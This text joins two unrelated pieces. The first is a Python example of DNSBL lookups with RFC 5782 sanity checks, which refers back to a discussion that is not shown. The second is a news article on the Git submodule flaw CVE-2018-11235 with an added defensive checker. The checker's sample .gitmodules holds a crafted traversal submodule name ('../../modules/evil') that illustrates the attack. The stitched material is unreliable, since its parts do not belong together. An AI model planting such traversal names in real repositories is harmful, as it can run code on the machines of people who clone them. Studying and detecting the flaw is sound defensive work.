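The wildcard failure described above, and the sanity check an RBL client should run before trusting a list, as an added example (not SpamCannibal's code, nor any mail server's): an RFC 5782 lookup (the reversed octets of the address under the list zone, listed if an A record comes back) guarded by the two test addresses the RFC defines, 127.0.0.2 must be listed and 127.0.0.1 must never be, so a zone that answers for every name fails the check and its answers are discarded rather than treated as listings. The zone names, addresses and resolver answers are constructed so the example runs offline; resolve_with_socket shows the real lookup and is not exercised here.

```python
import ipaddress
import socket


def dnsbl_query_name(ip, zone):
    """Build the DNSBL query name per RFC 5782: reversed IPv4 octets under the list zone."""
    addr = ipaddress.IPv4Address(ip)
    octets = str(addr).split(".")
    return ".".join(reversed(octets)) + "." + zone.rstrip(".") + "."


def resolve_with_socket(name):
    """Real resolver: the A record for name, or None on NXDOMAIN. Not used by the offline demo."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def is_listed(ip, zone, resolve):
    """An address is listed when the DNSBL returns any A record for its query name."""
    return resolve(dnsbl_query_name(ip, zone)) is not None


def dnsbl_is_sane(zone, resolve):
    """RFC 5782 section 5 test points: 127.0.0.2 MUST be listed, 127.0.0.1 MUST NOT be.
    A wildcarded zone (hijacked or parked) answers for every name and so fails the
    second condition; a dead or empty zone answers for nothing and fails the first."""
    return is_listed("127.0.0.2", zone, resolve) and not is_listed("127.0.0.1", zone, resolve)


def check_ip(ip, zone, resolve):
    """Return 'listed', 'clean', or 'unusable' (the list failed its sanity check,
    so none of its answers are trusted)."""
    if not dnsbl_is_sane(zone, resolve):
        return "unusable"
    return "listed" if is_listed(ip, zone, resolve) else "clean"


# Constructed stand-ins for DNS answers: one healthy list, one zone taken over
# by a wildcard record (hypothetical names, not real lists).
HEALTHY_ZONE = "bl.healthy.invalid"
HIJACKED_ZONE = "bl.hijacked.invalid"
_HEALTHY_ANSWERS = {
    dnsbl_query_name("127.0.0.2", HEALTHY_ZONE): "127.0.0.2",     # RFC test entry
    dnsbl_query_name("198.51.100.7", HEALTHY_ZONE): "127.0.0.2",  # a constructed listing
}


def fake_resolve(name):
    """Offline resolver: the hijacked zone answers every name (wildcard), the
    healthy zone answers only its real entries, everything else is NXDOMAIN."""
    if name.endswith("." + HIJACKED_ZONE + "."):
        return "192.0.2.10"  # parking server's address, returned for any subdomain
    return _HEALTHY_ANSWERS.get(name)


if __name__ == "__main__":
    for zone in (HEALTHY_ZONE, HIJACKED_ZONE):
        for ip in ("198.51.100.7", "203.0.113.5"):
            print(zone, ip, check_ip(ip, zone, fake_resolve))
```

The check costs two extra queries per list (cacheable for the list's TTL) and is what separates "everything is spam" from "this list is broken": a client that only looks at the queried address cannot tell a wildcard from a genuine listing.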


CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs
Vulnerability

The Git community disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates on a malicious repository.
The Git developers and companies offering Git repository hosting services have issued security updates to address this remote code execution vulnerability in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone --recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

The Git 2.17.1 addressed the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

An attacker could exploit CVE-2018-11235 by setting up a malformed Git repository containing a specially crafted submodule entry. The attacker then needs to trick victims into cloning the rogue repository with its submodules in order to execute arbitrary code on their systems.

The problem resides in the way the Git client handles the crafted submodule: its name from .gitmodules is used to build a path under $GIT_DIR/modules without being checked for directory traversal.

The release also adds a server-side check that Git hosting services can use to detect repositories containing such malicious submodule entries and reject their upload.

“In addition to the above fixes, this release adds support on the server side that rejects pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release note for v2.17.1.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targeting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”
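
The crafted .gitmodules described above, and the name check that a server-side fsck rejects it with, as an added example (not git's own code and not the researcher's proof of concept): a small parser for the submodule sections of .gitmodules, a check that mirrors the rule git's fix enforces (reject empty names and any ".." path component, treating both "/" and "\" as separators so the rule is platform-independent), and a helper that resolves where $GIT_DIR/modules/<name> would land so the escape is visible. The file content, submodule names and URLs are constructed for illustration; the traversal name only shows the shape of the attack, not the exact payload used in the disclosure.

```python
import posixpath
import re

# Section header of a submodule entry, e.g. [submodule "vendor/libfoo"]
SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]*)"\]\s*$')
# key = value lines inside a section (git-config syntax, simplified)
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text):
    """Return {submodule name: {key: value}} for a .gitmodules file.

    Handles only the subset of git-config syntax .gitmodules uses: comments
    and blank lines are skipped, escapes inside quoted names are not unescaped.
    """
    modules = {}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            modules.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            modules[current][m.group(1).lower()] = m.group(2)
    return modules


def submodule_name_is_safe(name):
    """Illustrative mirror of the rule git's fix applies to submodule names:
    reject empty names and any '..' component, with '/' or '\\' as separator."""
    if not name:
        return False
    return all(component != ".." for component in re.split(r"[/\\]", name))


def modules_dir_target(name, git_dir=".git"):
    """Where git stores the submodule's repository for this name:
    $GIT_DIR/modules/<name>, with '..' components resolved. A traversal
    name resolves to a location outside git_dir."""
    return posixpath.normpath(posixpath.join(git_dir, "modules", name))


def audit_gitmodules(text):
    """Return (name, path, resolved target) for every submodule whose name is rejected."""
    findings = []
    for name, fields in parse_gitmodules(text).items():
        if not submodule_name_is_safe(name):
            findings.append((name, fields.get("path"), modules_dir_target(name)))
    return findings


# Constructed sample: one benign entry and one whose name escapes
# $GIT_DIR/modules (hypothetical, not the disclosed payload).
SAMPLE_GITMODULES = """\
[submodule "libfoo"]
\tpath = vendor/libfoo
\turl = https://example.invalid/libfoo.git

[submodule "../../modules/evil"]
\tpath = evil
\turl = https://example.invalid/evil.git
"""

if __name__ == "__main__":
    for name, path, target in audit_gitmodules(SAMPLE_GITMODULES):
        print(f"rejected submodule name {name!r} (path {path}): would write to {target}")
```

Run against the sample, the benign entry resolves to .git/modules/libfoo while the crafted one resolves to modules/evil, i.e. outside the .git directory entirely; the same name rule, applied to pushed .gitmodules content, is what the receive.fsckObjects check turns into a rejected push.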

Major Git hosting services, including GitHub and Microsoft, have already deployed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encouraged all users to update their Git clients as soon as possible.

Thomson published a technical analysis of the CVE-2018-11235 vulnerability.